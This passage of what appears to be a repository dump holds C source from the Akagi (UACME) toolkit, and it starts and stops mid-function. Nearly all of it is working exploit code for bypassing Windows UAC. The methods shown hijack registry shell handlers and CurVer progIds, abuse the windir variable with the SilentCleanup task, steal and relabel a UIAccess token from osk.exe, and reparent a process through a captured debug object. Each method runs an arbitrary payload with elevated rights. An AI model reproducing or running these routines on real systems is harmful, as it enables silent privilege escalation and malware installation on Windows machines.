sizeof(WCHAR);\n\n ntStatus = NtSetValueKey(targetKey,\n &CmSymbolicLinkValue,\n 0,\n REG_LINK,\n (PVOID)usSlaveKey.Buffer,\n (ULONG)usSlaveKey.Length);\n\n if (!NT_SUCCESS(ntStatus))\n break;\n\n NtClose(targetKey);\n targetKey = NULL;\n\n if ((Method == UacMethodShellChangePk) || (Method == UacMethodShellSdclt)) {\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, lpszTargetApp);\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n shinfo.cbSize = sizeof(shinfo);\n shinfo.lpVerb = RUNAS_VERB;\n shinfo.lpFile = szBuffer;\n shinfo.nShow = SW_SHOWNORMAL;\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n if (ShellExecuteEx(&shinfo)) {\n Sleep(5000);\n TerminateProcess(shinfo.hProcess, 0);\n CloseHandle(shinfo.hProcess);\n MethodResult = STATUS_SUCCESS;\n }\n\n }\n else {\n if (supRunProcess(lpszTargetApp, NULL))\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (targetKey) NtClose(targetKey);\n if (masterRootKey) NtClose(masterRootKey);\n if (lpSlaveNtKey) supHeapFree(lpSlaveNtKey);\n\n //\n // Cleanup slave key.\n //\n if (bSlaveCreated) {\n if (classesKey) {\n RegDeleteKey(classesKey, &szSlaveKey[1]);//skip slash\n }\n }\n\n if (classesKey)\n NtClose(classesKey);\n\n if (SUCCEEDED(hr_init)) CoUninitialize();\n\n //\n // Remove symlink.\n //\n szMasterKey[0] = L'\\\\';\n szMasterKey[1] = 0;\n _strcpy(&szMasterKey[1], T_SOFTWARE_CLASSES);\n _strcat(szMasterKey, TEXT(\"\\\\\"));\n _strcat(szMasterKey, lpTargetKey);\n _strcat(szMasterKey, T_SHELL_OPEN);\n _strcat(szMasterKey, TEXT(\"\\\\\"));\n _strcat(szMasterKey, T_SHELL_COMMAND);\n supRemoveRegLinkHKCU(szMasterKey);\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n supEnableDisableWow64Redirection(FALSE);\n }\n#endif\n return MethodResult;\n}\n\n/*\n* ucmShellRegModMethod2\n*\n* Purpose:\n*\n* Bypass UAC using various registry shell key modifications.\n*\n*/\nNTSTATUS ucmShellRegModMethod2(\n _In_ UCM_METHOD Method,\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload\n)\n{\n BOOLEAN bBackupAvailable = FALSE;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n HANDLE hClassesRoot, hSubKey = NULL;\n DWORD dwDisp = 0;\n WCHAR szKey[MAX_PATH];\n PWSTR pwszKey;\n\n UNREFERENCED_PARAMETER(Method);\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n ntStatus = supEnableDisableWow64Redirection(TRUE);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n }\n#endif\n\n do {\n\n ntStatus = supOpenClassesKey(NULL, &hClassesRoot);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RtlSecureZeroMemory(&szKey, sizeof(szKey));\n\n _strcpy(szKey, lpTargetKey);\n _strcat(szKey, T_SHELL_OPEN);\n _strcat(szKey, TEXT(\"\\\\\"));\n _strcat(szKey, T_SHELL_COMMAND);\n\n //\n // If \"command\" key exist - backup it.\n //\n if (ERROR_SUCCESS == RegOpenKeyEx(hClassesRoot,\n szKey,\n 0,\n MAXIMUM_ALLOWED,\n (HKEY*)&hSubKey))\n {\n RegCloseKey(hSubKey);\n bBackupAvailable = (RegRenameKey(hClassesRoot,\n szKey,\n MYSTERIOUSCUTETHING) == ERROR_SUCCESS);\n }\n\n _strcat(szKey, TEXT(\"~\"));\n\n hSubKey = NULL;\n\n if (ERROR_SUCCESS != RegCreateKeyEx(hClassesRoot,\n szKey,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&hSubKey,\n &dwDisp))\n {\n break;\n }\n\n ntStatus = ucmxSetSlaveParams(hSubKey, lpszPayload);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n RegCloseKey(hSubKey);\n hSubKey = NULL;\n\n RegRenameKey(hClassesRoot, szKey, T_SHELL_COMMAND);\n\n if (supRunProcess(lpszTargetApp, NULL))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (hSubKey) RegCloseKey(hSubKey);\n\n //\n // Cleanup section.\n //\n\n _strcpy(szKey, lpTargetKey);\n _strcat(szKey, T_SHELL_OPEN);\n _strcat(szKey, TEXT(\"\\\\\"));\n\n if (bBackupAvailable) {\n\n pwszKey = _strend(szKey);\n\n _strcat(szKey, T_SHELL_COMMAND);\n RegDeleteKey(hClassesRoot, szKey);\n *pwszKey = 0;\n\n _strcat(szKey, MYSTERIOUSCUTETHING);\n\n RegRenameKey(hClassesRoot,\n szKey,\n T_SHELL_COMMAND);\n }\n else {\n _strcat(szKey, T_SHELL_COMMAND);\n RegDeleteKey(hClassesRoot, szKey);\n }\n\n if (hClassesRoot) NtClose(hClassesRoot);\n\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n supEnableDisableWow64Redirection(FALSE);\n }\n#endif\n return MethodResult;\n}\n\n/*\n* ucmShellRegModMethod3\n*\n* Purpose:\n*\n* Bypass UAC using registry shell key CurVer progId.\n*\n*/\nNTSTATUS ucmShellRegModMethod3(\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HANDLE hClassesRoot, hSubKey = NULL;\n\n SIZE_T sz;\n WCHAR szKey[MAX_PATH];\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n MethodResult = supEnableDisableWow64Redirection(TRUE);\n if (!NT_SUCCESS(MethodResult))\n return MethodResult;\n }\n#endif\n\n do {\n\n MethodResult = supOpenClassesKey(NULL, &hClassesRoot);\n if (!NT_SUCCESS(MethodResult))\n break;\n\n RtlSecureZeroMemory(&szKey, sizeof(szKey));\n\n //\n // Prepare registry key for a new handler.\n //\n _strcpy(szKey, ABSOLUTEWIN);\n _strcat(szKey, T_SHELL_OPEN);\n _strcat(szKey, TEXT(\"\\\\\"));\n _strcat(szKey, T_SHELL_COMMAND);\n\n if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&hSubKey,\n NULL))\n {\n sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);\n\n MethodResult = supRegWriteValue(hSubKey,\n NULL,\n REG_SZ,\n (PVOID)lpszPayload,\n (DWORD)sz);\n\n\n RegCloseKey(hSubKey);\n }\n\n if (!NT_SUCCESS(MethodResult))\n break;\n\n //\n // Set CurVer to target key\n //\n hSubKey = NULL;\n _strcpy(szKey, lpTargetKey);\n _strcat(szKey, TEXT(\"\\\\\"));\n _strcat(szKey, T_CURVER);\n\n if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&hSubKey,\n NULL))\n {\n sz = (1 + _strlen(ABSOLUTEWIN)) * sizeof(WCHAR);\n\n MethodResult = supRegWriteValue(hSubKey,\n NULL,\n REG_SZ,\n (PVOID)ABSOLUTEWIN,\n (DWORD)sz);\n\n if (NT_SUCCESS(MethodResult)) {\n\n if (supRunProcess(lpszTargetApp, NULL))\n MethodResult = STATUS_SUCCESS;\n\n }\n\n RegCloseKey(hSubKey);\n\n RegDeleteKey(hClassesRoot, szKey);\n }\n\n } while (FALSE);\n\n supRegDeleteKeyRecursive(hClassesRoot, ABSOLUTEWIN);\n\n if (hClassesRoot) NtClose(hClassesRoot);\n\n\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n supEnableDisableWow64Redirection(FALSE);\n }\n#endif\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/tyranid.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n* TITLE: TYRANID.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* James Forshaw autoelevation method(s)\n* Fine Dinning Tool (c) CIA\n*\n* For description please visit original URL\n* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html\n* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html\n* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html\n* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html\n* https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html\n* https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmDiskCleanupEnvironmentVariable\n*\n* Purpose:\n*\n* DiskCleanup task uses current user environment variables to build a path to the executable.\n* Warning: this method works with AlwaysNotify UAC level.\n*\n*/\nNTSTATUS ucmDiskCleanupEnvironmentVariable(\n _In_ LPWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n WCHAR szEnvVariable[MAX_PATH * 2];\n PWCHAR psz;\n BOOL quoteFix;\n\n do {\n\n if (_strlen(lpszPayload) > MAX_PATH)\n return STATUS_INVALID_PARAMETER;\n\n RtlSecureZeroMemory(szEnvVariable, sizeof(szEnvVariable));\n quoteFix = (g_ctx->dwBuildNumber >= NT_WIN10_21H2);\n\n //\n // Add quotes.\n //\n szEnvVariable[0] = L'\\\"';\n psz = &szEnvVariable[!!quoteFix];\n\n _strncpy(&szEnvVariable[1], MAX_PATH, lpszPayload, MAX_PATH);\n _strcat(szEnvVariable, L\"\\\"\");\n\n //\n // Set our controlled env.variable with payload.\n //\n if (!supSetEnvVariableEx(FALSE, NULL, T_WINDIR, psz))\n break;\n\n //\n // Run trigger task.\n //\n if (supStartScheduledTask(L\"\\\\Microsoft\\\\Windows\\\\DiskCleanup\", L\"SilentCleanup\"))\n MethodResult = STATUS_SUCCESS;\n\n //\n // Cleaup our env.variable.\n //\n supSetEnvVariableEx(TRUE, NULL, T_WINDIR, NULL);\n\n } while (FALSE);\n\n return MethodResult;\n}\n\n/*\n* ucmxTokenModUIAccessMethodInitPhase\n*\n* Purpose:\n*\n* Convert dll to new entrypoint/exe.\n*\n*/\nBOOL ucmxTokenModUIAccessMethodInitPhase(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_ LPCSTR EntryPointName,\n _In_ LPCWSTR PayloadFileName\n)\n{\n BOOL bResult = FALSE;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n //\n // Patch Fubuki to the new entry point and convert to EXE\n //\n if (supReplaceDllEntryPoint(ProxyDll,\n ProxyDllSize,\n EntryPointName,\n TRUE))\n {\n //\n // Drop modified Fubuki to the %temp%\n //\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, PayloadFileName);\n bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);\n }\n\n return bResult;\n}\n\n/*\n* ucmxTokenModUIAccessExec\n*\n* Purpose:\n*\n* Obtain token from UIAccess application, modify it and reuse for UAC bypass.\n*\n*/\nNTSTATUS ucmxTokenModUIAccessExec(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_ LPCSTR EntryPointName,\n _In_ LPCWSTR PayloadFileName,\n _In_ UCM_METHOD Method\n)\n{\n NTSTATUS Status = STATUS_ACCESS_DENIED;\n LPWSTR lpszPayload = NULL;\n PSID pIntegritySid = NULL;\n HANDLE hDupToken = NULL, hProcessToken = NULL;\n SHELLEXECUTEINFO shinfo;\n SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;\n TOKEN_MANDATORY_LABEL tml;\n SECURITY_QUALITY_OF_SERVICE sqos;\n OBJECT_ATTRIBUTES obja;\n WCHAR szBuffer[MAX_PATH * 2];\n\n STARTUPINFO si;\n PROCESS_INFORMATION pi;\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n\n do {\n //\n // Tweak and drop payload to %temp%.\n //\n if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,\n ProxyDllSize,\n EntryPointName,\n PayloadFileName))\n {\n break;\n }\n\n //\n // Spawn OSK.exe process.\n //\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, OSK_EXE);\n\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n shinfo.lpFile = szBuffer;\n shinfo.nShow = SW_HIDE;\n if (!ShellExecuteEx(&shinfo))\n break;\n\n //\n // Open process token.\n //\n Status = NtOpenProcessToken(shinfo.hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken);\n if (!NT_SUCCESS(Status))\n break;\n\n //\n // Duplicate primary token.\n //\n sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n sqos.ImpersonationLevel = SecurityImpersonation;\n sqos.ContextTrackingMode = 0;\n sqos.EffectiveOnly = FALSE;\n InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n obja.SecurityQualityOfService = &sqos;\n Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);\n if (!NT_SUCCESS(Status))\n break;\n\n NtClose(hProcessToken);\n hProcessToken = NULL;\n\n NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS);\n NtClose(shinfo.hProcess);\n shinfo.hProcess = NULL;\n\n //\n // Lower duplicated token IL from Medium+ to Medium.\n //\n Status = RtlAllocateAndInitializeSid(&MLAuthority,\n 1, SECURITY_MANDATORY_MEDIUM_RID,\n 0, 0, 0, 0, 0, 0, 0,\n &pIntegritySid);\n if (!NT_SUCCESS(Status))\n break;\n\n tml.Label.Attributes = SE_GROUP_INTEGRITY;\n tml.Label.Sid = pIntegritySid;\n\n Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,\n (ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));\n if (!NT_SUCCESS(Status))\n break;\n\n RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));\n RtlSecureZeroMemory(&si, sizeof(STARTUPINFO));\n si.cb = sizeof(STARTUPINFO);\n GetStartupInfo(&si);\n\n // \n // Run second stage exe to perform some gui hacks.\n //\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, PKGMGR_EXE);\n\n if (Method == UacMethodTokenModUiAccess) {\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n }\n\n if (CreateProcessAsUser(hDupToken,\n szBuffer, //application\n lpszPayload, //command line\n NULL,\n NULL,\n FALSE,\n CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS,\n NULL,\n NULL,\n &si,\n &pi))\n {\n if (WaitForSingleObject(pi.hProcess, 10000) == WAIT_TIMEOUT)\n TerminateProcess(pi.hProcess, (UINT)-1);\n\n CloseHandle(pi.hThread);\n CloseHandle(pi.hProcess);\n\n Status = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (hProcessToken) NtClose(hProcessToken);\n\n if (shinfo.hProcess) {\n NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS);\n NtClose(shinfo.hProcess);\n }\n if (hDupToken) NtClose(hDupToken);\n if (pIntegritySid) RtlFreeSid(pIntegritySid);\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, PayloadFileName);\n DeleteFile(szBuffer);\n\n return Status;\n}\n\n/*\n* ucmTokenModUIAccessMethod\n*\n* Purpose:\n*\n* Obtain token from UIAccess application, modify it and reuse for UAC bypass.\n*\n*/\nNTSTATUS ucmTokenModUIAccessMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,\n FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,\n UacMethodTokenModUiAccess);\n}\n\n/*\n* ucmTokenModUIAccessMethod2\n*\n* Purpose:\n*\n* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.\n*\n*/\nNTSTATUS ucmTokenModUIAccessMethod2(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n HKEY hKey;\n LRESULT lResult;\n NTSTATUS Status = STATUS_ACCESS_DENIED;\n SIZE_T sz;\n WCHAR szPayload[MAX_PATH * 2];\n\n _strcpy(szPayload, g_ctx->szTempDirectory);\n _strcat(szPayload, THEOLDNEWTHING);\n _strcat(szPayload, TEXT(\".dll\"));\n\n if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {\n\n hKey = NULL;\n lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,\n REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);\n if (lResult == ERROR_SUCCESS) {\n\n sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);\n lResult = RegSetValueEx(hKey,\n T_LOCATION,\n 0,\n REG_SZ,\n (BYTE*)szPayload,\n (DWORD)sz);\n\n if (lResult == ERROR_SUCCESS) {\n\n Status = ucmxTokenModUIAccessExec(ProxyDll,\n ProxyDllSize,\n FUBUKI_ENTRYPOINT_UIACCESS3,\n PKGMGR_EXE,\n UacMethodTokenModUiAccess2);\n\n }\n\n RegCloseKey(hKey);\n }\n\n RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);\n DeleteFile(szPayload);\n }\n return Status;\n}\n\n/*\n* ucmxCreateProcessFromParent\n*\n* Purpose:\n*\n* Create new process using parent process handle.\n*\n*/\nNTSTATUS ucmxCreateProcessFromParent(\n _In_ HANDLE ParentProcess,\n _In_ LPWSTR Payload)\n{\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n SIZE_T size = 0x30;\n\n STARTUPINFOEX si;\n PROCESS_INFORMATION pi;\n\n RtlSecureZeroMemory(&pi, sizeof(pi));\n RtlSecureZeroMemory(&si, sizeof(si));\n si.StartupInfo.cb = sizeof(STARTUPINFOEX);\n\n do {\n if (size > 1024)\n break;\n\n si.lpAttributeList = supHeapAlloc(size);\n if (si.lpAttributeList) {\n\n if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {\n if (UpdateProcThreadAttribute(si.lpAttributeList, 0,\n PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ParentProcess, sizeof(HANDLE), 0, 0)) //-V616\n {\n si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;\n si.StartupInfo.wShowWindow = SW_SHOW;\n\n if (CreateProcess(NULL,\n Payload,\n NULL,\n NULL,\n FALSE,\n CREATE_UNICODE_ENVIRONMENT | EXTENDED_STARTUPINFO_PRESENT,\n NULL,\n g_ctx->szSystemRoot,\n (LPSTARTUPINFO)&si,\n &pi))\n {\n CloseHandle(pi.hThread);\n CloseHandle(pi.hProcess);\n status = STATUS_SUCCESS;\n }\n }\n }\n\n if (si.lpAttributeList)\n DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine\n\n supHeapFree(si.lpAttributeList);\n }\n } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);\n\n return status;\n}\n\n/*\n* ucmDebugObjectMethod\n*\n* Purpose:\n*\n* Bypass UAC by direct RPC call to APPINFO and DebugObject use.\n*\n*/\nNTSTATUS ucmDebugObjectMethod(\n _In_ LPWSTR lpszPayload\n)\n{\n //UINT retryCount = 0;\n BOOL debugObjectSet = FALSE;\n NTSTATUS status = STATUS_ACCESS_DENIED;\n HANDLE dbgHandle = NULL, dbgProcessHandle = NULL, dupHandle = NULL;\n PROCESS_INFORMATION procInfo;\n DEBUG_EVENT dbgEvent;\n WCHAR szProcess[MAX_PATH * 2];\n\n do {\n\n //\n // Spawn initial non elevated victim process under debug.\n //\n //do { /* remove comment for attempt to spam debug object within thread pool */\n\n _strcpy(szProcess, g_ctx->szSystemDirectory);\n _strcat(szProcess, WINVER_EXE);\n\n if (!AicLaunchAdminProcess(szProcess,\n szProcess,\n 0,\n CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,\n g_ctx->szSystemRoot,\n T_DEFAULT_DESKTOP,\n NULL,\n INFINITE,\n SW_HIDE,\n &procInfo))\n {\n status = STATUS_UNSUCCESSFUL;\n break;\n }\n\n //\n // Capture debug object handle.\n //\n status = supGetProcessDebugObject(procInfo.hProcess,\n &dbgHandle);\n\n if (!NT_SUCCESS(status)) {\n TerminateProcess(procInfo.hProcess, 0);\n CloseHandle(procInfo.hThread);\n CloseHandle(procInfo.hProcess);\n procInfo.hThread = NULL;\n procInfo.hProcess = NULL;\n break;\n }\n\n //\n // Detach debug and kill non elevated victim process.\n //\n NtRemoveProcessDebug(procInfo.hProcess, dbgHandle);\n TerminateProcess(procInfo.hProcess, 0);\n CloseHandle(procInfo.hThread);\n CloseHandle(procInfo.hProcess);\n\n //} while (++retryCount < 20);\n\n //\n // Spawn elevated victim under debug.\n //\n _strcpy(szProcess, g_ctx->szSystemDirectory);\n _strcat(szProcess, COMPUTERDEFAULTS_EXE);\n RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n RtlSecureZeroMemory(&dbgEvent, sizeof(dbgEvent));\n\n if (!AicLaunchAdminProcess(szProcess,\n szProcess,\n 1,\n CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS,\n g_ctx->szSystemRoot,\n T_DEFAULT_DESKTOP,\n NULL,\n INFINITE,\n SW_HIDE,\n &procInfo))\n {\n status = STATUS_UNSUCCESSFUL;\n break;\n }\n\n //\n // Update thread TEB with debug object handle to receive debug events.\n //\n DbgUiSetThreadDebugObject(dbgHandle);\n debugObjectSet = TRUE;\n\n //\n // Debugger wait cycle.\n //\n while (1) {\n if (!WaitForDebugEvent(&dbgEvent, INFINITE))\n break;\n\n switch (dbgEvent.dwDebugEventCode) {\n //\n // Capture initial debug event process handle.\n //\n case CREATE_PROCESS_DEBUG_EVENT:\n dbgProcessHandle = dbgEvent.u.CreateProcessInfo.hProcess;\n break;\n }\n\n if (dbgProcessHandle)\n break;\n\n ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId, DBG_CONTINUE);\n }\n\n if (dbgProcessHandle) {\n //\n // Create new handle from captured with PROCESS_ALL_ACCESS.\n //\n status = NtDuplicateObject(dbgProcessHandle,\n NtCurrentProcess(),\n NtCurrentProcess(),\n &dupHandle,\n PROCESS_ALL_ACCESS,\n 0,\n 0);\n\n if (NT_SUCCESS(status)) {\n //\n // Run new process with parent set to duplicated process handle.\n //\n ucmxCreateProcessFromParent(dupHandle, lpszPayload);\n NtClose(dupHandle);\n dupHandle = NULL;\n }\n }\n\n } while (FALSE);\n\n //\n // Cleanup section.\n //\n if (debugObjectSet) {\n#pragma warning(push)\n#pragma warning(disable: 6387)\n DbgUiSetThreadDebugObject(NULL);\n#pragma warning(pop)\n }\n\n if (dbgHandle) {\n NtClose(dbgHandle);\n }\n\n if (dbgProcessHandle) {\n CloseHandle(dbgProcessHandle);\n }\n\n // Release victim process if still open\n if (procInfo.hThread) {\n CloseHandle(procInfo.hThread);\n }\n\n if (procInfo.hProcess) {\n TerminateProcess(procInfo.hProcess, 0);\n CloseHandle(procInfo.hProcess);\n }\n\n supSetGlobalCompletionEvent();\n return status;\n}\n"
},
{
"path": "Source/Akagi/methods/wusa.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n* TITLE: WUSA.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Windows Update Standalone Installer (WUSA) based routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n\n/*\n* ucmCreateCabinetForSingleFile\n*\n* Purpose:\n*\n* Build cabinet for usage in methods where required 1 file.\n*\n*/\nBOOL ucmCreateCabinetForSingleFile(\n _In_ LPWSTR lpSourceDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_opt_ LPWSTR lpInternalName\n)\n{\n BOOL bResult = FALSE;\n CABDATA *Cabinet = NULL;\n LPWSTR lpFileName;\n WCHAR szMsuFileName[MAX_PATH * 2];\n\n if ((ProxyDll == NULL) ||\n (ProxyDllSize == 0) ||\n (lpSourceDll == NULL)) return bResult;\n\n do {\n\n //drop proxy dll\n if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {\n break;\n }\n\n //build cabinet\n RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));\n _strcpy(szMsuFileName, g_ctx->szTempDirectory);\n _strcat(szMsuFileName, ELLOCNAK_MSU);\n\n Cabinet = cabCreate(szMsuFileName);\n if (Cabinet == NULL)\n break;\n\n if (lpInternalName == NULL) {\n lpFileName = _filename(lpSourceDll);\n }\n else {\n lpFileName = lpInternalName;\n }\n\n //put file without compression\n bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);\n cabClose(Cabinet); \n\n } while (FALSE);\n\n DeleteFile(lpSourceDll);\n\n return bResult;\n}\n\n/*\n* ucmWusaCabinetCleanup\n*\n* Purpose:\n*\n* Remove fake msu file.\n*\n*/\nVOID ucmWusaCabinetCleanup(\n VOID)\n{\n WCHAR szMsuFileName[MAX_PATH * 2];\n\n RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));\n _strcpy(szMsuFileName, g_ctx->szTempDirectory);\n _strcat(szMsuFileName, ELLOCNAK_MSU);\n DeleteFile(szMsuFileName);\n}\n\nvolatile ULONG g_ThreadFinished = 0;\n\n/*\n* ucmxInvokeWusaThread\n*\n* Purpose:\n*\n* Start wusa and wait a bit.\n*\n*/\nDWORD ucmxInvokeWusaThread(\n PVOID Param)\n{\n SHELLEXECUTEINFO shinfo;\n WCHAR szProcess[MAX_PATH * 2];\n WCHAR szParameters[MAX_PATH * 3];\n\n UNREFERENCED_PARAMETER(Param);\n\n InterlockedExchange((LONG*)&g_ThreadFinished, 0);\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n\n _strcpy(szProcess, g_ctx->szSystemDirectory);\n _strcat(szProcess, WUSA_EXE);\n\n RtlSecureZeroMemory(szParameters, sizeof(szParameters));\n _strcpy(szParameters, TEXT(\" /quiet \"));\n _strcat(szParameters, g_ctx->szTempDirectory);\n _strcat(szParameters, ELLOCNAK_MSU);\n\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;\n shinfo.lpFile = szProcess;\n shinfo.lpParameters = szParameters;\n shinfo.nShow = SW_HIDE;\n\n if (ShellExecuteEx(&shinfo)) {\n\n if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)\n TerminateProcess(shinfo.hProcess, 0);\n\n CloseHandle(shinfo.hProcess);\n }\n Sleep(2000);\n InterlockedExchange((LONG*)&g_ThreadFinished, 1);\n return 0;\n}\n\n/*\n* ucmxDirectoryWatchdogThread\n*\n* Purpose:\n*\n* Monitor directory creation in system root directory.\n* When it happened - set reparse point.\n*\n*/\nDWORD ucmxDirectoryWatchdogThread(\n PVOID Param)\n{\n BOOL bResult = FALSE;\n NTSTATUS status;\n\n HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;\n IO_STATUS_BLOCK IoStatusBlock;\n OBJECT_ATTRIBUTES ObjectAttributes;\n\n LPWSTR lpTargetDirectory = (LPWSTR)Param;\n\n PVOID Buffer = NULL;\n SIZE_T memIO = 0;\n FILE_NOTIFY_INFORMATION *pInfo = NULL;\n\n LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;\n\n\n do {\n\n //\n // Convert target directory path to native form.\n //\n usTargetDirectory.Buffer = NULL;\n if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))\n break;\n\n //\n // Convert watch directory path to native form.\n //\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n szBuffer[0] = L'\\\\';\n szBuffer[1] = L'?';\n szBuffer[2] = L'?';\n szBuffer[3] = L'\\\\';\n _strncpy(&szBuffer[4], MAX_PATH, g_ctx->szSystemDirectory, 3);\n\n //\n // Open directory for change notification.\n //\n RtlInitUnicodeString(&usWatchDirectory, szBuffer);\n InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, 